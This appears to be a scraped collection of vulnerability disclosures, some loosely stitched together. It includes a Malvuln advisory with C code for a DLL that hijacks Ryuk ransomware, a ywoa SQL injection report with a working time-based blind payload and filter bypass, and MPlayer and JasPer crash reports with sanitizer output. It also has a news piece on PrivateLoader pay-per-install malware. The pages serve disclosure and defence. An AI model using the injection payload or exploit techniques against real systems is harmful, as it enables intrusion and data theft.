Trojan.Ransom.Ryuk.A ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a DLL, execute our own code, and control and terminate the malware pre-encryption. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32" and if not, we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/5ac0f050f93f86e69026faea1fbb4450.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan.Ransom.Ryuk.AVulnerability: Arbitrary Code ExecutionDescription: The ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: RyukType: PE32MD5: 5ac0f050f93f86e69026faea1fbb4450Vuln ID: MVID-2022-0640Disclosure: 09/19/2022Exploit/PoC:1) Compile the following C code as "urlmon.dll"2) Place the DLL in same directory as the ransomware3) Optional - Hide it: attrib +s +h "urlmon.dll"4) Run the malware#include "windows.h"//By malvuln//Purpose: Exploit Ryuk/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**///gcc -c urlmon.c -m32//gcc -shared -o urlmon.dll urlmon.o -m32BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Ryuk\nPWNED By MALVULN", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   GetCurrentDirectory(MAX_PATH, TEXT(buf));   int rc = strcmp("C:\\Windows\\System32", TEXT(buf));     if(rc != 0){     HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Ransom.Ryuk.A MVID-2022-0640 Code Execution

drivers/scsi/stex.c in the Linux kernel through 5.19.9 allows local users to obtain sensitive information from kernel memory because stex_queuecommand_lck lacks a memset for the PASSTHRU_CMD case.

AgeCommit message (Expand)AuthorFilesLines 2021-10-16scsi: core: Remove the 'done' argument from SCSI queuecommand\_lck functionsBart Van Assche1\-2/+2 2021-10-16scsi: stex: Call scsi\_done() directlyBart Van Assche1\-4/+2 2021-08-11scsi: stex: Use scsi\_cmd\_to\_rq() instead of scsi\_cmnd.requestBart Van Assche1\-3/+3 2021-05-31scsi: core: Kill DRIVER\_SENSEHannes Reinecke1\-2/+2 2021-05-31scsi: core: Introduce scsi\_build\_sense()Hannes Reinecke1\-4/+1 2021-01-22scsi: stex: Do not set COMMAND\_COMPLETEHannes Reinecke1\-12/+13 2020-12-02scsi: stex: Fix fall-through warnings for ClangGustavo A. R. Silva1\-0/+1 2020-03-11scsi: Replace zero-length array with flexible-array memberGustavo A. R. Silva1\-1/+1 2019-05-30treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 152Thomas Gleixner1\-6/+1 2018-12-18scsi: remove the use\_clustering flagChristoph Hellwig1\-1/+1 2018-12-18scsi: make sure all drivers set the use\_clustering flagChristoph Hellwig1\-0/+1 2018-11-15scsi: stex: use dma\_set\_mask\_and\_coherentChristoph Hellwig1\-14/+3 2017-04-26scsi: stex: make S6flag staticColin Ian King1\-1/+1 2017-03-15scsi: stex: Add S6 supportCharles1\-2/+23 2017-03-15scsi: stex: Support Pegasus 3 productCharles1\-67/+195 2016-02-23stex: Add S3/S4 supportCharles1\-3/+65 2016-02-23stex: Add hotplug supportCharles1\-19/+34 2016-02-23stex: Support to Pegasus series.Charles1\-6/+26 2015-11-09stex: Remove use of struct timevalTina Ruchandani1\-10/+3 2015-11-09scsi: use host wide tags by defaultChristoph Hellwig1\-8/+0 2014-11-12scsi: don't force tagged\_supported in driversChristoph Hellwig1\-11/+0 2014-11-12scsi: don't set tagging state from scsi\_adjust\_queue\_depthChristoph Hellwig1\-2/+0 2014-11-12scsi: always assign block layer tags if enabledChristoph Hellwig1\-8/+2 2014-11-12scsi: Remove scsi\_print\_command when calling abortHannes Reinecke1\-6/+3 2013-10-14SCSI: remove unnecessary pci\_set\_drvdata()Jingoo Han1\-2/+0 2013-01-03Drivers: scsi: remove \_\_dev\* attributes.Greg Kroah-Hartman1\-3/+2 2010-11-16SCSI host lock push-downJeff Garzik1\-1/+3 2010-03-30include cleanup: Update gfp.h and slab.h includes to prepare for breaking imp...Tejun Heo1\-0/+1 2010-01-04\[SCSI\] stex: fix scan of nonexistent lunEd Lin1\-0/+5 2009-10-29\[SCSI\] stex: update version to 4.6.0000.4Ed Lin1\-4/+4 2009-10-29\[SCSI\] stex: add support for reset request from firmwareEd Lin1\-83/+166 2009-10-29\[SCSI\] stex: add small dma buffer supportEd Lin1\-5/+20 2009-09-05\[SCSI\] stex: Add reset code for st\_yel (v2)Ed Lin1\-4/+29 2009-04-07dma-mapping: replace all DMA\_32BIT\_MASK macro with DMA\_BIT\_MASK(32)Yang Hongyang1\-2/+2 2009-04-07dma-mapping: replace all DMA\_64BIT\_MASK macro with DMA\_BIT\_MASK(64)Yang Hongyang1\-2/+2 2009-04-03\[SCSI\] stex: update version to 4.6.0000.3Ed Lin1\-5/+5 2009-04-03\[SCSI\] stex: add new 6G controller supportEd Lin1\-31/+351 2009-04-03\[SCSI\] stex: use config struct for parameters of different controllersEd Lin1\-76/+125 2009-04-03\[SCSI\] stex: add MSI supportEd Lin1\-5/+43 2009-04-03\[SCSI\] stex: small code fixes and changesEd Lin1\-65/+60 2009-03-12\[SCSI\] stex: Version updateEd Lin - PTU1\-3/+3 2009-03-12\[SCSI\] stex: Small fixesEd Lin - PTU1\-6/+22 2009-03-12\[SCSI\] stex: Fix for controller type st\_yosemiteEd Lin - PTU1\-61/+3 2009-03-12\[SCSI\] stex: Add new device idEd Lin - PTU1\-2/+6 2009-03-12\[SCSI\] stex: Fix for potential invalid responseEd Lin - PTU1\-0/+1 2008-12-29\[SCSI\] advansys, arcmsr, ipr, nsp32, qla1280, stex: use pci\_ioremap\_bar()Arjan van de Ven1\-2/+1 2008-12-01\[SCSI\] stex: switch to block timeoutJames Bottomley1\-1/+1 2008-07-26\[SCSI\] stex: fix queue depth settingMike Christie1\-1/+1 2008-04-07\[SCSI\] stex: use scsi\_build\_sense\_bufferFUJITA Tomonori1\-12/+5 2008-04-07\[SCSI\] stex: use sg buffer copy helper functionsFUJITA Tomonori1\-56/+10 2008-02-22\[SCSI\] stex: stex\_internal\_copy should be called with sg\_count in struct st\_ccbFUJITA Tomonori1\-4/+6 2008-02-22\[SCSI\] stex: stex\_direct\_copy shouldn't call dma\_map\_sgFUJITA Tomonori1\-22/+12 2008-01-30\[SCSI\] remove use\_sg\_chainingJames Bottomley1\-1/+0 2007-10-16\[SCSI\] add use\_sg\_chaining option to scsi\_host\_templateFUJITA Tomonori1\-0/+1 2007-07-14\[SCSI\] stex: use resid for xfer len informationEd Lin1\-2/+2 2007-05-30\[SCSI\] Merge up to linux-2.6 headJames Bottomley1\-36/+54 2007-05-29\[SCSI\] stex: convert to use the data buffer accessorsFUJITA Tomonori1\-73/+36 2007-05-16\[SCSI\] stex: minor cleanup and version updateEd Lin1\-3/+13 2007-05-16\[SCSI\] stex: fix reset recovery for console deviceEd Lin1\-0/+7 2007-05-16\[SCSI\] stex: extend hard reset wait timeEd Lin1\-1/+6 2007-05-16\[SCSI\] stex: fix id mapping issueEd Lin1\-32/+28 2007-02-14\[PATCH\] remove many unneeded #includes of sched.hTim Schmielau1\-1/+0 2006-12-05\[SCSI\] stex: version updateEd Lin1\-4/+2 2006-12-05\[SCSI\] stex: change wait loop codeEd Lin1\-21/+20 2006-12-05\[SCSI\] stex: add new device type supportEd Lin1\-7/+21 2006-12-05\[SCSI\] stex: update device id infoEd Lin1\-9/+26 2006-12-05\[SCSI\] stex: adjust default queue lengthEd Lin1\-1/+10 2006-12-05\[SCSI\] stex: add value check in hard reset routineEd Lin1\-1/+1 2006-12-05\[SCSI\] stex: fix controller\_info command handlingEd Lin1\-0/+1 2006-12-05\[SCSI\] stex: fix biosparam calculationEd Lin1\-3/+3 2006-10-05IRQ: Maintain regs pointer globally rather than passing to IRQ handlersDavid Howells1\-1/+1 2006-10-01\[SCSI\] stex: add new device (id 0x8650) supportEd Lin1\-30/+164 2006-10-01\[SCSI\] stex: cancel unused field in struct req\_msgEd Lin1\-2/+1 2006-09-02\[SCSI\] add failure return to scsi\_init\_shared\_tag\_map()James Bottomley1\-3/+2 2006-09-02\[SCSI\] stex: add shared tags from blockEd Lin1\-120/+57 2006-09-02\[SCSI\] Add Promise SuperTrak driverJeff Garzik1\-0/+1316

CVE-2022-40768: git/torvalds/linux.git - Linux kernel source tree

JasPer 3.0.6 allows denial of service via a reachable assertion in the function inttobits in libjasper/base/jas_image.c.

**summary**

Hello, I was testing my fuzzer and found a reachable assertion in imginfo. An assertion in function inttobits can be reached when parsing a crafted jp2 file, when running ./imginfo -f $POC, as shown in the attachment

**Environment**

*   Ubuntu 22.04 (docker)
*   gcc/g++ 11.2.0
*   jasper latest commit 0c2a927

**Step to reproduce**

    mkdir jasper-build && pushd jasper-build 
    cmake -DJAS_ENABLE_SHARED=NO .. && make -j$(nproc)
    ./src/app/imginfo -f $POC
    

**output**

    imginfo: /benchmark/jasper/src/libjasper/base/jas_image.c:1010: inttobits: Assertion `v >= 0 || sgnd' failed.
    Aborted (core dumped)
    

**POC**

poc0.zip

**Credit**

Han Zheng (NCNIPC of China, Hexhive)  
Yin Li, Xiaotong Jiao (NCNIPC of China)

CVE-2022-40755: [BUG] Reachable assertion in inttobits, jas_image.c · Issue #338 · jasper-software/jasper

Cybersecurity researchers have exposed new connections between a widely used pay-per-install (PPI) malware service known as PrivateLoader and another PPI service dubbed ruzki.
"The threat actor ruzki (aka les0k, zhigalsz) advertises their PPI service on underground Russian-speaking forums and their Telegram channels under the name ruzki or zhigalsz since at least May 2021," SEKOIA said.
The

Cybersecurity researchers have exposed new connections between a widely used pay-per-install (PPI) malware service known as PrivateLoader and another PPI service dubbed ruzki.

"The threat actor ruzki (aka les0k, zhigalsz) advertises their PPI service on underground Russian-speaking forums and their Telegram channels under the name ruzki or zhigalsz since at least May 2021," SEKOIA said.

The cybersecurity firm said its investigations into the twin services led it to conclude that PrivateLoader is the proprietary loader of the ruzki PPI malware service.

PrivateLoader, as the name implies, functions as a C++-based loader to download and deploy additional malicious payloads on infected Windows hosts. It's primarily distributed through SEO-optimized websites that claim to provide cracked software.

Although it was first documented earlier this February by Intel471, it's said to have been put to use starting as early as May 2021.

Some of the most common commodity malware families propagated through PrivateLoader include Redline Stealer, Socelars, Raccoon Stealer, Vidar, Tofsee, Amadey, DanaBot, and ransomware strains Djvu and STOP.

A May 2022 analysis from Trend Micro uncovered the malware distributing a framework called NetDooka. A follow-up report from BitSight late last month found significant infections in India and Brazil as of July 2022.

A new change spotted by SEKOIA is the use of VK.com documents service to host the malicious payloads as opposed to Discord, a shift likely motivated by increased monitoring of the platform's content delivery network.

PrivateLoader is also configured to communicate with command-and-control (C2) servers to fetch and exfiltrate data. As of mid-September, there are four active C2 servers, two in Russia and one each in Czechia and Germany.

"Based on the wide selection of malware families, which implies a wide range of threat actors or intrusion sets operating this malware, the PPI service running PrivateLoader is very attractive and popular to attackers on underground markets," the researchers said.

SEKOIA further said it unearthed ties between PrivateLoader and ruzki, a threat actor that sells bundles of 1,000 installations on infected systems located across the world ($70), or specifically Europe ($300) or the U.S. ($1,000).

These advertisements, which have been placed in the Lolz Guru cybercrime forum, target threat actors (aka prospective customers) who wish to distribute their payloads through the PPI service.

The association stems mainly from the below observations -

*   An overlap between the PrivateLoader C2 servers and that of URLs provided by ruzki to the subscribers so as to monitor installation statistics related to their campaigns
*   References to ruzki in PrivateLoader botnet sample names that were used to deliver the Redline Stealer, such as ruzki9 and 3108\_RUZKI, and
*   The fact that both PrivateLoader and ruzki commenced operations in May 2021, with the ruzki operator using the term "our loader" in Russian on its Telegram channel

"Pay-per-Install services always played a key role in the distribution of commodity malware," the researchers said.

"As yet another turnkey solution lowering the cost of entry into the cybercriminal market and a service contributing to a continuous professionalization of the cybercriminal ecosystem, it is highly likely more PrivacyLoader-related activity will be observed in the short term."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Find Link b/w PrivateLoader and Ruzki Pay-Per-Install Services

ywoa v6.1 is vulnerable to SQL Injection via backend/oa/visual/exportExcel.do interface.

**Environment construction**

http://partner.yimihome.com/static/index.html#/index/sys\_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

**idea**

Download: http://partner.yimihome.com/static/index.html#/index/idea\_deploy First set it up as shown here, after setting it up, import the database, after importing, you need to change the link configuration yimioa/c-core/src/main/ resources/application.properties Modify the mysql connection information, and then just start  But idea start, more bugs, and report more errors, here is idea static look at the code

**/oa/visual/exportExcel.do interface orderby injection Bypass****Vulnerability recurrence**

GET /oa/visual/exportExcel.do?code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&op=1&sort=desc&isMine=true HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=339C404636300F5F43B74EC828919D11; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl

**bypass** poc

%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Code audit and function implementation**

Did not find the corresponding web function point, here is a direct look at the static code interface audit  
  
orderby, here the parameters, and then look down, because the above personnel function point that GET injection already know getModuleListSqlAndUrlStr method, so look down, directly orderby passed in  
So it causes SQL injection, if not bypass, there will be no problem, after all, the filter method has been bypassed.

CVE-2022-38808: SQL injection exists in ywoa v6.1 backend/oa/visual/exportExcel.do interface · Issue #26 · cloudwebsoft/ywoa

Certain The MPlayer Project products are vulnerable to Out-of-bounds Read via function read_meta_record() of mplayer/libmpdemux/asfheader.c. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.

**#2393 closed defect (fixed)**

Reported by:

Owned by:

beastd

Priority:

normal

Component:

undetermined

Version:

HEAD

Severity:

major

Keywords:

Cc:

Blocked By:

Blocking:

Reproduced by developer:

no

Analyzed by developer:

no

Version: SVN-r38374-13.0.1  

Build command: ../configure --disable-ffmpeg\_a && make (compiling with asan)  

Summary of the bug: A out-of-bound read is found in fucnction read\_meta\_record() which affects mplayer and mencoder. The attached file can reproduce this issue And this vulnerability can cause the crash of mplayer.  

How to reproduce:  

1.Command: ./mplayer testcase  

2.Result:  

MPlayer SVN-r38374-9 (C) 2000-2022 MPlayer Team                                                                                                                                                                                                                           
Playing libavformat version 58.29.100 (external)                                                                                             
ASF file format detected.                                                                                                            
\[asfheader\] Video stream found, -vid 1                                                                                                                                                                                                                                                                                                                                                                         
MPlayer interrupted by signal 11 in module: demux\_open                                                                               
- MPlayer crashed by bad usage of CPU/FPU/RAM.                                                                                         
Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and                                                                 
disassembly. Details in DOCS/HTML/en/bugreports\_what.html#bugreports\_crash.                                                        
- MPlayer crashed. This shouldn't happen.                                                                                              
It can be a bug in the MPlayer code \_or\_ in your drivers \_or\_ in your                                                                
gcc version. If you think it's MPlayer's fault, please read                                                                          
DOCS/HTML/en/bugreports.html and follow the instructions there. We can't and                                                         
won't help unless you provide this information when reporting a possible bug.

3.After debugging with gdb, I found the crash is caused by access to a piece of unmmaped memory:  

Program received signal SIGSEGV, Segmentation fault.
read\_meta\_record (buf\_len=<synthetic pointer>, buf=0x55bc7b4c52a2 <error: Cannot access memory at address 0x55bc7b4c52a2>, dest=<synthetic pointer>) at libmpdemux/asfheader.c:242
242       dest->lang\_list\_index = AV\_RL16(buf);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────\[ REGISTERS \]────────────────────────────────────────────────────────────
 RAX  0x9e000004
 RBX  0x55bbdd4c529e ◂— 0x1000000000001                                                                                                                                                                                                                                                                                                                                                RCX  0x1
 RDX  0x1a
 RDI  0x55bbdd4c5284 ◂— 0xfda811cf5b4df869                                                                                                                                                                                                                                                                                                                                             RSI  0x1a                                                                                                                                                                                                                                                                                                                                                                             R8   0x0
 R9   0x10                                                                                                                                                                                                                                                                                                                                                                             R10  0x0
 R11  0x1ce
 R12  0x55bc7b4c52a2
 R13  0x0
 R14  0x55bbdd4c51d0 ◂— 0x11cfa9478cabdca1
 R15  0x1e1
 RBP  0x62000103
 RSP  0x7fff0e88d9f0 —▸ 0x7fff0e88da00 ◂— 0x55bb000001ce
 RIP  0x55bbdb4dde47 (read\_asf\_header+2935) ◂— movzx  edx, word ptr \[r12 + 4\]
─────────────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────────────
 ► 0x55bbdb4dde47 <read\_asf\_header+2935>    movzx  edx, word ptr \[r12 + 4\]
   0x55bbdb4dde4d <read\_asf\_header+2941>    movzx  r9d, word ptr \[r12\]
   0x55bbdb4dde52 <read\_asf\_header+2946>    movzx  ecx, word ptr \[r12 + 2\]
   0x55bbdb4dde58 <read\_asf\_header+2952>    mov    eax, dword ptr \[r12 + 8\]
   0x55bbdb4dde5d <read\_asf\_header+2957>    mov    esi, edx
   0x55bbdb4dde5f <read\_asf\_header+2959>    lea    rdi, \[r12 + 0xc\]
   0x55bbdb4dde64 <read\_asf\_header+2964>    sub    ebp, edx
   0x55bbdb4dde66 <read\_asf\_header+2966>    js     read\_asf\_header+3128 <read\_asf\_header+3128>
    ↓
   0x55bbdb4ddf08 <read\_asf\_header+3128>    mov    ebx, dword ptr \[rsp + 0x44\]
   0x55bbdb4ddf0c <read\_asf\_header+3132>    mov    rax, qword ptr \[rsp + 0x18\]
   0x55bbdb4ddf11 <read\_asf\_header+3137>    mov    rdi, qword ptr \[rsp + 0x20\]
──────────────────────────────────────────────────────────\[ SOURCE (CODE) \]──────────────────────────────────────────────────────────
In file: /home/jlx/good\_mplayer/mplayer/libmpdemux/asfheader.c
   237 #define CHECKDEC(l, n) if (((l) -= (n)) < 0) return 0
   238 static char\* read\_meta\_record(ASF\_meta\_record\_t\* dest, char\* buf,
   239     int\* buf\_len)
   240 {
   241   CHECKDEC(\*buf\_len, 2 + 2 + 2 + 2 + 4);
 ► 242   dest->lang\_list\_index = AV\_RL16(buf);
   243   dest->stream\_num = AV\_RL16(&buf\[2\]);
   244   dest->name\_length = AV\_RL16(&buf\[4\]);
   245   dest->data\_type = AV\_RL16(&buf\[6\]);
   246   dest->data\_length = AV\_RL32(&buf\[8\]);
   247   buf += 2 + 2 + 2 + 2 + 4;
──────────────────────────────────────────────────────────────\[ STACK \]──────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fff0e88d9f0 —▸ 0x7fff0e88da00 ◂— 0x55bb000001ce
01:0008│      0x7fff0e88d9f8 ◂— 0xfb775cd5000001e1
02:0010│      0x7fff0e88da00 ◂— 0x55bb000001ce
03:0018│      0x7fff0e88da08 —▸ 0x55bbdd4c50f0 ◂— 0x11cf668e75b22630
04:0020│      0x7fff0e88da10 —▸ 0x55bbdd4c53c0 —▸ 0x55bbdd461400 ◂— 0x0
05:0028│      0x7fff0e88da18 —▸ 0x55bbdd4c37a0 —▸ 0x55bbdb712ce0 (demuxer\_desc\_asf) —▸ 0x55bbdb6b3e9e ◂— 'ASF demuxer'
06:0030│      0x7fff0e88da20 ◂— 0x1
07:0038│      0x7fff0e88da28 ◂— 0x55bb00000001
────────────────────────────────────────────────────────────\[ BACKTRACE \]────────────────────────────────────────────────────────────
 ► f 0     55bbdb4dde47 read\_asf\_header+2935
   f 1     55bbdb4dde47 read\_asf\_header+2935
   f 2     55bbdb4dde47 read\_asf\_header+2935
   f 3     55bbdb4e9059 demux\_open\_asf+57
   f 4     55bbdb4e58f3 demux\_open\_stream+931
   f 5     55bbdb4e63e1 demux\_open+753
   f 6     55bbdb414dcb main+4027
   f 7     7f15770a80b3 \_\_libc\_start\_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p buf
$2 = 0x55bc7b4c52a2 <error: Cannot access memory at address 0x55bc7b4c52a2>

CVE-2022-38851: #2393 (Out-of-bound read in function read_meta_record() of mplayer/libmpdemux/asfheader.c) – MPlayer

Mplayer SVN-r38374-13.0.1 is vulnerable to Memory Leak via vf.c and vf_vo.c.

**#2390 closed defect (fixed)**

Reported by:

Owned by:

beastd

Priority:

normal

Component:

vf

Version:

unspecified

Severity:

normal

Keywords:

Cc:

Blocked By:

Blocking:

Reproduced by developer:

no

Analyzed by developer:

no

Summary of the bug: Found a .viv file for mplayer where asan reports a memory leak.  
How to reproduce:Use the attached file to reproduce this issue (ASAN-recompilation are required)  
version: SVN-r38374-13.0.1  
kernel version:ubuntu 20.04; Linux 5.15.0-46-generic  
complier version:clang 13.0.1-2ubuntu2~20.04.1  

mplayer and ASAN output:  

Player SVN-r38374-13.0.1 (C) 2000-2022 MPlayer Team  

Playing /home/ldy/sample/useful/03-KimagureOrangeRoad.viv.  
libavformat version 58.29.100 (external)  
VIVO file format detected.  
VIDEO: \[viv2\] 320x240 24bpp 10.000 fps 0.0 kbps ( 0.0 kbyte/s)  
\[gl\] using extended formats. Use -vo gl:nomanyfmts if playback fails.  
\==========================================================================  
Requested video codec family \[vivo\] (vfm=vfw) not available.  
Enable it at compilation.  
Cannot find codec matching selected -vo and video format 0x32766976.  
\==========================================================================  
Clip info:  

> title: <No Title>  
> author: NV  
> copyright: <No Copyright>  
> encoder: VivoActive VideoNow 3.0 for Windows  

Load subtitles in /home/ldy/sample/useful/  
\==========================================================================  
Requested audio codec family \[vivoaudio\] (afm=acm) not available.  
Enable it at compilation.  
Opening audio decoder: \[ffmpeg\] FFmpeg/libavcodec audio decoders  
libavcodec version 58.54.100 (external)  
Cannot find codec 'siren' in libavcodec...  
ADecoder init failed :(  
ADecoder init failed :(  
Cannot find codec for audio format 0x112.  
Audio: no sound  
Video: no video  

Exiting... (End of file)  

\=================================================================  
\==3993864==ERROR: LeakSanitizer: detected memory leaks  

Direct leak of 576 byte(s) in 1 object(s) allocated from:  

> #0 0x55ac7b1e06dd in malloc (/home/ldy/good\_mplayer/asan\_playr/mplayer+0x33e6dd)  
> #1 0x55ac7b42992e in vf\_open\_plugin /home/ldy/good\_mplayer/mplayer/libmpcodecs/vf.c:478:8  

Indirect leak of 24 byte(s) in 1 object(s) allocated from:  

> #0 0x55ac7b1e0872 in interceptor\_calloc (/home/ldy/good\_mplayer/asan\_playr/mplayer+0x33e872)  
> #1 0x55ac7b50a2cd in vf\_open /home/ldy/good\_mplayer/mplayer/libmpcodecs/vf\_vo.c:215:14  

SUMMARY: AddressSanitizer: 600 byte(s) leaked in 2 allocation(s).

CVE-2022-38600: #2390 (memory leak in vf.c and vf_vo.c) – MPlayer

Certain The MPlayer Project products are vulnerable to Buffer Overflow via read_avi_header() of libmpdemux/aviheader.c . This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.

**#2403 closed defect (fixed)**

Reported by:

Owned by:

beastd

Priority:

normal

Component:

undetermined

Version:

HEAD

Severity:

major

Keywords:

Cc:

Blocked By:

Blocking:

Reproduced by developer:

no

Analyzed by developer:

no

Version: SVN-r38374-13.0.1  

Build command: ../configure --disable-ffmpeg\_a && make (compiling with asan)  

Summary of the bug: An heap-buffer-overflow is found in fucnction read\_avi\_header () which affects mencoder and mplayer The attached file can reproduce this issue (ASAN-recompilation is needed).  

How to reproduce:  

1.Command: ./mencoder -ovc lavc -oac lavc -o /dev/null ./testcase  

> ./mplayer ./testcase  

2.Result:  

MPlayer SVN-r38374-9 (C) 2000-2022 MPlayer Team

Playing /home/jlx/crashes/id^%000059,sig^%06,src^%001757,time^%15822098,execs^%776566,op^%havoc,rep^%2.
libavformat version 58.29.100 (external)
AVI file format detected.
\[aviheader\] Video stream found, -vid 0
\[aviheader\] Audio stream found, -aid 1


MPlayer interrupted by signal 11 in module: demux\_open
- MPlayer crashed by bad usage of CPU/FPU/RAM.
  Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and
  disassembly. Details in DOCS/HTML/en/bugreports\_what.html#bugreports\_crash.
- MPlayer crashed. This shouldn't happen.
  It can be a bug in the MPlayer code \_or\_ in your drivers \_or\_ in your
  gcc version. If you think it's MPlayer's fault, please read
  DOCS/HTML/en/bugreports.html and follow the instructions there. We can't and
  won't help unless you provide this information when reporting a possible bug.

MPlayer SVN-r38374-13.0.1 (C) 2000-2022 MPlayer Team

Playing /home/jlx/crashes/id^%000059,sig^%06,src^%001757,time^%15822098,execs^%776566,op^%havoc,rep^%2.
libavformat version 58.29.100 (external)
AVI file format detected.
\[aviheader\] Video stream found, -vid 0
=================================================================
==7938==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000002db0 at pc 0x55c64191557c bp 0x7ffcdbc68090 sp 0x7ffcdbc68088
READ of size 4 at 0x602000002db0 thread T0
    #0 0x55c64191557b in read\_avi\_header /home/jlx/good\_mplayer/mplayer/libmpdemux/aviheader.c:364:12
    #1 0x55c641948cbe in demux\_open\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:464:3
    #2 0x55c641948cbe in demux\_open\_hack\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:885:14
    #3 0x55c641921f37 in demux\_open /home/jlx/good\_mplayer/mplayer/libmpdemux/demuxer.c:1294:10
    #4 0x55c6416232ed in main /home/jlx/good\_mplayer/mplayer/mplayer.c:3383:22
    #5 0x7fa5a6c780b2 in \_\_libc\_start\_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

0x602000002db0 is located 31 bytes to the right of 1-byte region \[0x602000002d90,0x602000002d91)
allocated by thread T0 here:
    #0 0x55c6415c81cd in malloc (/home/jlx/good\_mplayer/asan\_mplayer/mplayer+0x3431cd)
    #1 0x55c64190a934 in read\_avi\_header /home/jlx/good\_mplayer/mplayer/libmpdemux/aviheader.c:358:26
    #2 0x55c641948cbe in demux\_open\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:464:3
    #3 0x55c641948cbe in demux\_open\_hack\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:885:14
    #4 0x55c641921f37 in demux\_open /home/jlx/good\_mplayer/mplayer/libmpdemux/demuxer.c:1294:10
    #5 0x55c6416232ed in main /home/jlx/good\_mplayer/mplayer/mplayer.c:3383:22
    #6 0x7fa5a6c780b2 in \_\_libc\_start\_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jlx/good\_mplayer/mplayer/libmpdemux/aviheader.c:364:12 in read\_avi\_header
Shadow bytes around the buggy address:
  0x0c047fff8560: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff8570: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff8580: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff8590: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff85a0: fa fa 00 00 fa fa 00 00 fa fa 06 fa fa fa fd fd
=>0x0c047fff85b0: fa fa 01 fa fa fa\[fa\]fa fa fa fa fa fa fa fa fa
  0x0c047fff85c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff85d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff85e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7938==ABORTING

